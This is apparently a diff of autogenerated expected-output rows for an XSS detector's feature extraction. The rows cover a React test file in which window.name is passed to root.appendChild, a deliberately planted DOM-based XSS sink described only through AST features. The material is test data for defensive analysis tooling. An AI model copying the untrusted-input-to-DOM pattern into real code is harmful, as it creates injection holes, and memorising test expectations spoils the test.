| root.appendChild | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:20 | root.appendChild | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:20 | root.appendChild | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:33 | exceptional return of root.ap ... w.name) | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:33 | exceptional return of root.ap ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:33 | exceptional return of root.ap ... w.name) | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:33 | exceptional return of root.ap ... w.name) | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:33 | exceptional return of root.ap ... w.name) | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:33 | root.ap ... w.name) | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:33 | root.ap ... w.name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:33 | root.ap ... w.name) | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:33 | root.ap ... w.name) | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:5:10:33 | root.ap ... w.name) | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:10:10:20 | appendChild | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:10:10:20 | appendChild | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:10:10:20 | appendChild | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:10:10:20 | appendChild | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:10:10:20 | appendChild | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:22:10:27 | window | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:22:10:27 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:22:10:27 | window | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:22:10:27 | window | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:22:10:27 | window | fileImports | ./react-create-context react | | autogenerated/Xss/DomBasedXss/react-use-context.js:10:22:10:32 | window.name | CalleeFlexibleAccessPath | root.appendChild | | autogenerated/Xss/DomBasedXss/react-use-context.js:10:22:10:32 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-context.js:10:22:10:32 | window.name | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | @@ -14612,6 +106213,204 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-context.js:10:22:10:32 | window.name | enclosingFunctionName | useDoc1 | | autogenerated/Xss/DomBasedXss/react-use-context.js:10:22:10:32 | window.name | fileImports | ./react-create-context react | | autogenerated/Xss/DomBasedXss/react-use-context.js:10:22:10:32 | window.name | receiverName | root | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:29:10:32 | name | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:29:10:32 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:29:10:32 | name | enclosingFunctionBody | root useMyContext root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:29:10:32 | name | enclosingFunctionName | useDoc1 | +| autogenerated/Xss/DomBasedXss/react-use-context.js:10:29:10:32 | name | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:1:18:1 | C | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:1:18:1 | C | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:1:18:1 | C | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:1:18:1 | class C ... }\\n} | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:1:18:1 | class C ... }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:1:18:1 | class C ... }\\n} | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:7:13:7 | C | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:7:13:7 | C | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:7:13:7 | C | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:17:13:25 | Component | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:17:13:25 | Component | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:17:13:25 | Component | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | 'arguments' object of default constructor of class C | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | 'arguments' object of default constructor of class C | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | 'arguments' object of default constructor of class C | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | 'arguments' object of default constructor of class C | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | 'arguments' object of default constructor of class C | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | (...arg ... rgs); } | assignedToPropName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | (...arg ... rgs); } | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | (...arg ... rgs); } | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | (...arg ... rgs); } | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | ...args | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | ...args | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | ...args | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | ...args | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | ...args | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | args | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | constru ... rgs); } | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | constru ... rgs); } | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | constru ... rgs); } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | constru ... rgs); } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | constru ... rgs); } | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | constru ... rgs); } | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | constructor | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | constructor | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | constructor | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | exceptional return of default constructor of class C | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | exceptional return of default constructor of class C | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | exceptional return of default constructor of class C | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | exceptional return of default constructor of class C | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | exceptional return of default constructor of class C | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | exceptional return of super(...args) | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | exceptional return of super(...args) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | exceptional return of super(...args) | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | exceptional return of super(...args) | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | exceptional return of super(...args) | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | return of default constructor of class C | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | return of default constructor of class C | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | return of default constructor of class C | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | return of default constructor of class C | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | return of default constructor of class C | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | super | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | super | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | super | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | super | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | super | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | super(...args) | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | super(...args) | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | super(...args) | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | super(...args) | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | super(...args) | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | this | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | this | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | this | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/react-use-context.js:13:27:13:26 | this | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:5:14:7 | foo | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:5:14:7 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:5:14:7 | foo | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:5:17:5 | foo() { ... K\\n } | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:5:17:5 | foo() { ... K\\n } | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:5:17:5 | foo() { ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:5:17:5 | foo() { ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:5:17:5 | foo() { ... K\\n } | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:5:17:5 | foo() { ... K\\n } | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:14:7 | this | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:14:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:14:7 | this | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:14:7 | this | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:14:7 | this | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | 'arguments' object of method foo of class C | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | 'arguments' object of method foo of class C | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | 'arguments' object of method foo of class C | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | 'arguments' object of method foo of class C | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | 'arguments' object of method foo of class C | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | () {\\n ... K\\n } | assignedToPropName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | () {\\n ... K\\n } | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | () {\\n ... K\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | () {\\n ... K\\n } | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | exceptional return of method foo of class C | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | exceptional return of method foo of class C | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | exceptional return of method foo of class C | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | exceptional return of method foo of class C | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | exceptional return of method foo of class C | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | return of method foo of class C | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | return of method foo of class C | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | return of method foo of class C | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | return of method foo of class C | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:14:8:17:5 | return of method foo of class C | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:20 | { root } | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:20 | { root } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:20 | { root } | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:20 | { root } | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:20 | { root } | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:35 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:35 | root | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:35 | root | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:35 | root | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:35 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:35 | { root ... context | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:35 | { root ... context | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:35 | { root ... context | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:35 | { root ... context | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:13:15:35 | { root ... context | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:15:15:18 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:24:15:27 | this | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:24:15:27 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:24:15:27 | this | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:24:15:27 | this | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:24:15:27 | this | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:24:15:35 | this.context | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:24:15:35 | this.context | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:24:15:35 | this.context | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:24:15:35 | this.context | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:24:15:35 | this.context | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:29:15:35 | context | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:29:15:35 | context | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:29:15:35 | context | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:29:15:35 | context | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:15:29:15:35 | context | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:12 | root | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:12 | root | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:12 | root | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:12 | root | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:12 | root | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:24 | root.appendChild | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:24 | root.appendChild | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:24 | root.appendChild | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:24 | root.appendChild | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:24 | root.appendChild | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:37 | exceptional return of root.ap ... w.name) | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:37 | exceptional return of root.ap ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:37 | exceptional return of root.ap ... w.name) | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:37 | exceptional return of root.ap ... w.name) | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:37 | exceptional return of root.ap ... w.name) | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:37 | root.ap ... w.name) | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:37 | root.ap ... w.name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:37 | root.ap ... w.name) | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:37 | root.ap ... w.name) | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:9:16:37 | root.ap ... w.name) | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:14:16:24 | appendChild | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:14:16:24 | appendChild | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:14:16:24 | appendChild | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:14:16:24 | appendChild | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:14:16:24 | appendChild | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:26:16:31 | window | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:26:16:31 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:26:16:31 | window | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:26:16:31 | window | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:26:16:31 | window | fileImports | ./react-create-context react | | autogenerated/Xss/DomBasedXss/react-use-context.js:16:26:16:36 | window.name | CalleeFlexibleAccessPath | root.appendChild | | autogenerated/Xss/DomBasedXss/react-use-context.js:16:26:16:36 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-context.js:16:26:16:36 | window.name | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | @@ -14620,6 +106419,138 @@ tokenFeatures | 